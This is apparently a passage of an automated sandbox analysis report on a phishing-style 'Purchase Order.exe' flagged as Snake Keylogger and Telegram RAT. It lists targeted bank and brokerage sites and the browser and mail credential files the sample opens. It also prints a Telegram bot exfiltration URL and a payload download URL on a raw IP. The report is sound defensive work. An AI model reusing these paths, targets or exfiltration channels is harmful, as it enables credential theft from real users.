Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006318000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW81
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Purchase Order.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Purchase Order.exe API call chain: ExitProcess graph end node
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase Order.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00405F19 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405F19
Source: C:\Users\user\Desktop\Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.130.0
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
84.38.129.16
 unknown Latvia
203557 DATACLUB-NL false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.130.0 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://84.38.129.16/efxSlCP242.bin false
      		unknown
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown
      https://reallyfreegeoip.org/xml/155.94.241.186 false
        		unknown